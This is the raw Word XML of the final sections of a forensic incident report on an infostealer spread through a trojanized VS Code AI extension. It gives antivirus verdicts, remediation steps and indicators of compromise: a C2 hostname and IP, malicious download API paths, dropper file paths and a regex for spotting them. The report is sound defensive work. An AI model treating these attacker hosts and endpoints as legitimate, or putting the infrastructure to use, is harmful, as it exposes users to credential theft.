              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="0F172A"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="0F172A"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="1E293B"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="0F172A"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="1E293B"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Threat Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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E293B"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>AhnLab-V3</w:t>
            </w:r>
          </w:p>
        </w:tc>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B91C1C"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Infostealer/Win.Lzveil.R801029</w:t>
            </w:r>
          </w:p>
        </w:tc>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Information / Credential Stealer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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E293B"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Avast</w:t>
            </w:r>
          </w:p>
        </w:tc>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B91C1C"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>MalwareX-gen [Pws]</w:t>
            </w:r>
          </w:p>
        </w:tc>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Password Stealer (PWS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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E293B"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Microsoft Defender</w:t>
            </w:r>
          </w:p>
        </w:tc>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B91C1C"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Trojan:Win32/Wacatac.B!ml</w:t>
            </w:r>
          </w:p>
        </w:tc>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Staged Trojan Dropper</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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E293B"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Malwarebytes</w:t>
            </w:r>
          </w:p>
        </w:tc>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B91C1C"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Trojan.Injector</w:t>
            </w:r>
          </w:p>
        </w:tc>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Process Injector</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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E293B"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ESET-NOD32</w:t>
            </w:r>
          </w:p>
        </w:tc>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B91C1C"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Win64/Kryptik.HTB Trojan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="12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Packed / Encrypted Malware</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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E293B"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CrowdStrike Falcon</w:t>
            </w:r>
          </w:p>
        </w:tc>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B91C1C"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Win/malicious_confidence_60%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="12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1E293B"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>High-Confidence Malicious</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9936"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9936"/>
            <w:shd w:fill="0F172A"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="16" w:space="0" w:color="0F172A"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">                              VIRUSTOTAL VERDICT</w:t>
              <w:br/>
              <w:t xml:space="preserve">   +-----------------------------------------------------------------------+</w:t>
              <w:br/>
              <w:t xml:space="preserve">   | AhnLab-V3           [!] Infostealer/Win.Lzveil.R801029                |</w:t>
              <w:br/>
              <w:t xml:space="preserve">   | Avast               [!] MalwareX-gen [Pws] (Password Stealer)         |</w:t>
              <w:br/>
              <w:t xml:space="preserve">   | Microsoft Defender  [!] Trojan:Win32/Wacatac.B!ml                     |</w:t>
              <w:br/>
              <w:t xml:space="preserve">   | Malwarebytes        [!] Trojan.Injector                               |</w:t>
              <w:br/>
              <w:t xml:space="preserve">   | ESET-NOD32          [!] Win64/Kryptik.HTB Trojan                      |</w:t>
              <w:br/>
              <w:t xml:space="preserve">   | CrowdStrike         [!] Win/malicious_confidence_60%                  |</w:t>
              <w:br/>
              <w:t xml:space="preserve">   +-----------------------------------------------------------------------+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="991B1B"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Remediation Protocol Executed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Because the payload was classified as an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Infostealer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>, host deletion alone was insufficient:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Process &amp; File Remediation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: Terminated any active orphan processes and permanently deleted the staging folder (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>%TEMP%\pkg-4a3cded7\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>) and extension files.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Session Invalidation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: Instructed the victim to use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>"Sign out of all sessions / devices"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> from an uncompromised device (e.g., mobile phone) across Discord, Google, GitHub, and email accounts. This immediately revokes stolen session cookies and tokens.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Password &amp; Token Rotation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: Changed account master passwords and rotated all active GitHub Personal Access Tokens (PATs) and SSH keys.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Endpoint Hardening</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: Recommended a full antivirus offline scan and monitoring of payment methods associated with compromised accounts.</w:t>
      </w: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8. Indicators of Compromise (IoCs)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="991B1B"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Network Indicators</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>C2 Hostname</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>https://alpme.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Direct Origin IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>31.57.201.86</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (AS40662 — Layer7 Technologies Inc., UAE)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Subnet Block</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>31.57.201.0/24</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>API Endpoints</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/api/vscode/software/pick?platform=win</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/api/vscode/software/download/*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Threat Actor GitHub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>github.com/AlpmeVetGit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Account scrubbed/deleted)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="991B1B"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Host Indicators</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Captured Payload SHA-256</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ed5f166035a2b3332bc349043b8d1d53a26da5551c06bc47d1bda8e16a7ac1dc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Temporary Dropper Paths</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>%TEMP%\pkg-4a3cded7\25si.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>%TEMP%\winhlp-*\24si.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>28si.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>29si.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>%TEMP%\(svchost|wuauclt|winhlp|pkg)[-_][0-9a-f]{8,14}\.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>SQLite GlobalStorage Keys (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>state.vscdb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>alpme.partnerSoftware.lastSha256</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>alpme.partnerSoftware.lastPath</w:t>
      </w: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9. Conclusion &amp; Investigator Takeaways</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>This investigation illustrates the escalating supply-chain risk targeting developers through cracked and trojanized AI extensions. Repackaging popular open-source utilities allows threat actors to gain initial execution in developer environments, where high-value credentials, source code, and active API tokens frequently reside.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>By conducting systematic VM sandbox analysis, JavaScript AST deobfuscation, and lightweight incident response tool authoring, the campaign infrastructure was mapped, indicators were documented, and real-world victim workstations were remediated before secondary credential theft could expand further.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CBD5E1"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="2" w:color="0F172A"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>10. Authorship, Attribution &amp; Copyright Notice</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Lead Researcher &amp; Author</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: PenguinBTW  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Role</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: Independent Security Researcher &amp; Incident Responder (Year 13)  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Copyright</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: © 2026 PenguinBTW. All Rights Reserved.  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>This research dossier and the accompanying forensic utilities were authored and developed by PenguinBTW. Distribution of the technical findings and detection tooling is permitted for defensive cybersecurity, incident response, and non-commercial educational purposes, provided that full author attribution to PenguinBTW is maintained.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CONFIDENTIAL &amp; PRIVILEGED  //  DIGITAL FORENSICS &amp; INCIDENT RESPONSE (DFIR)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7"/>
      </w:rPr>
      <w:t>OPERATION ALPME  //  FORENSIC INVESTIGATION DOSSIER (REVISED)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